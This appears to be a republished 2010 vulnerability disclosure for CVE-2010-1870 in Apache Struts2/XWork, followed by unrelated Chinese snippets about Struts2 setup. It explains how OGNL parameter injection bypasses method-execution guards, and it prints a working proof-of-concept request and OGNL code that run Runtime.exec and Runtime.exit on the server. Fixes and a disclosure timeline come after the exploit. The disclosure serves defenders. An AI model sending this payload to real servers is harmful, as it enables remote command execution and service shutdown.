测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
Friday, July 9, 2010
CVE-2010-1870: Struts2/XWork remote command execution
Update Tue Jul 13 2010: Added proof of concept
Apache Struts team has announced uploaded but has not released, due to
an unreasonably prolonged voting process, the 2.2.0 release of the
Struts2 web framework which fixes vulnerability that I've reported to
them on May 31st 2010. Apache Struts team is ridiculously slow in
releasing the fixed version and all of my attempts to expedite the
process have failed.
Introduction
Struts2 is Struts + WebWork. WebWork in turn uses XWork to invoke
actions and call appropriate setters/getters based on HTTP parameter
names, which is achieved by treating each HTTP parameter name as an OGNL
statement. OGNL (Object Graph Navigation Language) is what turns:
user.address.city=Bishkek&user['favoriteDrink']=kumys
into
action.getUser().getAddress().setCity("Bishkek")
action.getUser().setFavoriteDrink("kumys")
This is performed by the ParametersInterceptor, which calls
ValueStack.setValue() with user-supplied HTTP parameters as arguments.
NOTE: If you are using XWork's ParametersInterceptor or operate with
OGNL ValueStack in a similar way then you are vulnerable
(ParametersInterceptor is on by default in struts-default.xml).
In addition to property getting/setting, OGNL supports many more
features:
* Method calling: foo()
* Static method calling: @java.lang.System@exit(1)
* Constructor calling: new MyClass()
* Ability to work with context variables: #foo = new MyClass()
* And more...
Since HTTP parameter names are OGNL statements, to prevent an attacker
from calling arbitrary methods via HTTP parameters XWork has the
following two variables guarding methods execution:
* OgnlContext's property 'xwork.MethodAccessor.denyMethodExecution'
(set to true by default)
* SecurityMemberAccess private field called
'allowStaticMethodAccess' (set to false by default)
OGNL Context variables
To make it easier for developer to access various frequently needed
objects XWork provides several predefined context variables:
* #application
* #session
* #request
* #parameters
* #attr
These variables represent various server-side objects, such as session
map. To prevent attackers from tampering with server-side objects
XWork's ParametersInterceptor disallowed # in parameter names. About a
year ago I found a way to bypass that protection(XW-641) using Java's
unicode String representation: \u0023. At the time I felt like the fix
that was implemented (OGNL value stack clearing) was insufficient, but
had not time to investigate this further.
CVE-2010-1870
Earlier this year I finally got a chance to look at this again and found
that in addition to the above mentioned context variables there were
more:
* #context - OgnlContext, the one guarding method execution based on
'xwork.MethodAccessor.denyMethodExecution' property value.
* #_memberAccess - SecurityMemberAccess, whose 'allowStaticAccess'
field prevented static method execution.
* #root
* #this
* #_typeResolver
* #_classResolver
* #_traceEvaluations
* #_lastEvaluation
* #_keepLastEvaluation
You can probably see the problem already. Using XW-641 trick I was able
to modify the values that were guarding Java methods execution and run
arbitrary Java code:
#_memberAccess['allowStaticMethodAccess'] = true
#foo = new java .lang.Boolean("false")
#context['xwork.MethodAccessor.denyMethodExecution'] = #foo
#rt = @java.lang.Runtime@getRuntime()
#rt.exec('mkdir /tmp/PWNED')
Actual proof of concept had to use OGNL's expression evaluation when
crafting HTTP request. PoC for this bug will be published on July 12
2010. To test whether your application is vulnerable you can use the
following proof of concept, which will call
java.lang.Runtime.getRuntime().exit(1):
http://mydomain/MyStruts.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1
Fixing CVE-2010-1870
Struts2 users must upgrade to the 2.2.0, which whitelists a set of
characters that excludes characters required to exploit this
vulnerability.
In cases where upgrade isn't possible you can use ParameterInterceptor's
"excludeParams" parameter to whitelist the characters required for your
application to operate correctly(usually A-z0-9_.'"[]) alternatively
you can blacklist \()@ which are the characters required to exploit this
bug.
Timeline
May 31st - email to
security@struts.apache.org
with vulnerability report.
June 4th - no response received, contacted developers again.
June 5th - had to find an XWork developer on IRC to look at this.
June 16th - Atlassian fixes vulnerability in its products. Atlassian and
Struts developers worked together in coming up with the fix.
June 20th - 1-line fix commited
June 29th - Struts 2.2.0 release voting process started and is still
going...
相关推荐
### Struts2框架搭建及配置详解 #### 一、Struts2框架简介 Struts2是Struts的一个改进版本,它结合了WebWork框架和Struts框架的优点,并且增加了许多新特性,使得开发者能够更加方便地开发Java Web应用程序。...
在Struts2框架中,`<sx:>`标签是Struts2 XWork库的一部分,用于增强JSP页面的功能,提供更强大的数据绑定和表单处理能力。本篇将重点讲解如何利用`sx:`标签实现组合查询和带分页功能。 首先,让我们了解下Struts2的...
struts2下的Xwork2源文件 在 opensymphony开源社区http://www.opensymphony.com/ 可匿名使用SVN checkout xwork2的源代码 http://svn.opensymphony.com/svn/xwork/trunk
论坛系统(Struts 2+Hibernate+Spring实现)<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE validators SYSTEM ...
而XWork是Struts2的核心组件,它负责处理Action的业务逻辑和控制流程。在深入理解Struts2与XWork的关系之前,我们首先需要了解MVC模式的基本概念。 MVC模式是一种软件设计模式,它将应用程序分为三个主要部分:模型...
Struts2.2.3 + xwork半中文帮助文档 Struts2.2.3 + xwork半中文帮助文档 Struts2.2.3 + xwork半中文帮助文档 Struts2.2.3 + xwork半中文帮助文档 Struts2.2.3 + xwork半中文帮助文档
根据提供的文件信息,我们可以深入探讨Struts2与XWork2的相关知识点,特别是关于它们的下载、功能特性以及在实际项目中的应用。 ### Struts2框架简介 Apache Struts2是基于MVC(Model-View-Controller)设计模式的...
### Struts2配置详解 #### 一、总览 在深入了解Struts2配置文件之前,我们首先需要了解其整体架构。Struts2的核心配置文件通常采用XML格式,并且具有非常清晰的结构。此配置文件主要负责定义应用的行为、组件以及...
Struts2是一个强大的Java web开发框架,它基于MVC(Model-View-Controller)设计模式,为开发者提供了构建可维护性、可扩展性良好的应用程序的工具和机制。在这个"简单的Struts2小程序"中,我们可以深入理解Struts2...
通过深入学习XWork的源码,开发者能够理解Struts2框架的工作原理,优化性能,解决实际开发中的问题,同时也能为自定义插件和扩展提供基础。理解XWork的设计模式和核心机制,将有助于提升开发效率和代码质量,使项目...
其他依赖如`struts2-core-2.3.14.jar`,`xwork-core-2.3.14.jar`等,都是Struts2框架的核心组件,它们提供了动作调度、拦截器、类型转换、结果类型等核心功能。`javassist-3.11.0.GA.jar`用于动态类生成,`ognl-...
Struts2和XWork2是两个非常重要的Java Web框架,它们在开发企业级应用程序时扮演着核心角色。Struts2是基于MVC(Model-View-Controller)设计模式的开源框架,而XWork2则是其底层的核心工作引擎,负责处理Action、...
4. **集成性**:Struts2可以很好地与Spring、Hibernate等其他流行框架集成,提供一站式的解决方案。 **Xwork** 则是Struts2的基础,它处理了Action的生命周期和执行流程。Xwork的主要功能包括: 1. **Action管理**...
4. **struts2-tiles-plugin-2.0.6.jar**:Struts2 Tiles插件。 5. **struts2-core-2.0.6.jar**:Struts2核心库。 6. **xwork-2.0.1.jar**:XWork核心库,用于处理用户请求。 #### 三、配置web.xml 接下来,在项目的...
XWork是Struts2的核心,它提供了一系列的工具和功能,使得开发者能够更高效地处理请求、控制业务流程以及管理应用状态。2.3.16是Struts2的一个稳定版本,包含了许多修复和改进。 XWork Doc文档集是关于Struts2 ...
<filter-name>struts2</filter-name> <filter-class> org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter </filter-class> </filter> <filter-mapping> <filter-name>struts2</filter-...
Struts2框架提供了一种简单有效的方式来解决这一问题,即通过`<s:token/>`标签和相关的拦截器机制来实现。 #### 二、Struts2框架简介 Struts2是一个基于Java的开源Web应用框架,它继承了Struts1的优点,并且进行了...
Struts2 基础知识 Struts2 是一个基于 MVC 模式的 Java Web 应用程序框架,主要...这个配置文件告诉 Struts2 框架,这个类是一个 Action,将来 Struts2 框架中要给这个类创建对象,调用方法以及加入更多丰富的功能。
Struts2和XWork2是两个非常重要的Java Web框架,它们在开发企业级应用程序时起着核心作用。Struts2是基于MVC(Model-View-Controller)设计模式的开源框架,而XWork2则是其底层工作框架,负责处理Action和业务逻辑。...